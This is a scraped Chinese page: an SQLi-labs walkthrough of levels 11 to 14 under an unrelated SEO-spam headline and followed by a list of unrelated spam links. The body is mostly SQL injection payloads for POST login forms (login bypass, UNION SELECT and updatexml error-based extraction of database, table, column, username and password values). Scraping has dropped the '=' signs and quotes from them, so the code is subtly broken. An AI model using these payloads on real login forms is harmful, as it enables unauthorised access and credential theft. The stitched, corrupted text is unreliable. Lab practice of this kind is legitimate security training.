当前位置: 首页 > news >正文

福州鼓楼区网站建设小型便利店装修设计

福州鼓楼区网站建设,小型便利店装修设计,小程序seo帝搜软件sem880官网,商业空间设计师岗位职责前言 第1-10关都是get方法#xff0c;本关开始进入post方法。其实post也好get也好#xff0c;本质都差不多#xff0c;使用的技巧也基本相同。 Less11 第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交#xff0c;这里我们尝试在Username一栏通过…前言 第1-10关都是get方法本关开始进入post方法。其实post也好get也好本质都差不多使用的技巧也基本相同。 Less11 第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交这里我们尝试在Username一栏通过单引号闭合看看什么效果 提示有个报错看来就是单引号闭合那可以肯定这里有个注入点在Username框尝试注意每个输入前面都有个单引号空格是闭合变量用的不是手误 or 11 -- asd 是不是发现和第一关的get方法效果类似既然有回显那就尝试通过联合注入的方式先看看有多少列在Username框输入 union select 1 -- asd 这里报错了表示union后的列数不对当我们尝试 union select 1,2 -- asd 不仅对了而且还把联合注入部分回显到页面和第一关类似。那接下来就是获取数据库命了在Username框输入 union select database(),2 -- asd 得到数据库名为security。接着就是获取表名 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) -- asd 显然users应该就是我们要找的表然后是查找列名 union select 1,(select group_concat(column_name) from information_schema.columns where table_nameusers) -- asd 列名中username和password应该就是我们要找的列然后查出用户名和密码 union select 1,(select group_concat(username) from users) -- asd union select 1,(select group_concat(password) from users) -- asd 通关 Less12 第十二关先输入单引号 显示错误再输入双引号 看报错信息应该是双引号和括号作为闭合测试一下在Username框输入 ) or 11 -- asd 成功那就确定了通过双引号括号闭合。剩下的参考第11关即可不再复述。 Less13 第13关先测试单引号 看来是单引号括号的闭合再测试 ) or 11 -- asd 确定了单引号括号的闭合但是这里没有登陆正确的回显。不过有错误的回显所以可以利用updatexml大法来处理和第五关的处理方式类似。在Username框输入 ) or updatexml(1,concat(~,database(),~),1) -- asd 找出了数据库名为security。然后找出对应表名Username对话框输入 ) or updatexml(1,concat(~,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),~),1) -- asd 第一个表是emails我们逐个尝试当输入 ) or updatexml(1,concat(~,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),~),1) -- asd 找出了users表。接着是列名同样我们逐个尝试后在输入以下两条时找到了username和password列名 ) or updatexml(1,concat(~,(select column_name from information_schema.columns where table_nameusers limit 4,1),~),1) -- asd ) or updatexml(1,concat(~,(select column_name from information_schema.columns where table_nameusers limit 5,1),~),1) -- asd 之后找出用户名Username框输入 ) or updatexml(1,concat(~,(select username from security.users limit 0,1),~),1) -- asd 密码 ) or updatexml(1,concat(~,(select password from security.users limit 0,1),~),1) -- asd 通关 Less14 第14关和13关类似区别仅在于通过双引号闭合其余都一样不另外叙述。
http://www.hkea.cn/news/14265120/

相关文章:

  • h5网站实例邢台网站定制
  • 做网站一定需要虚拟主机吗兰州小的网络公司
  • 做网站时无法上传图片可信网站查询官网
  • 离石网站建设公司半岛网
  • 网站空间位置医院网站加快建设方案
  • 顺的网站建设效果dz论坛seo设置
  • 做网站的图哪来开网店一年的费用
  • 企业网站建设源码网站营销公司哪家好
  • 阿里云虚拟主机做wordpress手机百度关键词排名 网站优化软件
  • 网站建设钅金手指排名十五小程序外包多少钱
  • 想建网站怎么做注册网站域名的作用
  • 深圳市城乡和建设局网站网站建设期末题答案
  • 电子商务网站建设学什么外贸网站推广怎么样
  • 外包网站价格专业网站设计公司地址
  • 佛山网站建设模板企业网站设计期末考试
  • 学校网站建设好么电商网站开发教材
  • 云南网站建设是什么网页小游戏免费
  • 怎么样关闭网站长沙app制作公司哪家好
  • 济宁做网站深圳网站品牌建设
  • wordpress如何做站群公司网站建设要求
  • 做公司网站的多少钱wordpress网站迁移后插件
  • asp.net做毕业设计网站盐城网站建设培训班
  • 苏州中国建设银行招聘信息网站景观网站设计网站
  • 策划 网站全网搜索软件
  • 广州网站建设有哪些网站开发实训意义
  • wordpress急速主题网站后台优化
  • 海外网站推广公司精准软件
  • 怎么做网站界面分析连接器零售在什么网站做
  • 赣州人才网暑假工搜索优化
  • 网站如何做备份集成装修全屋定制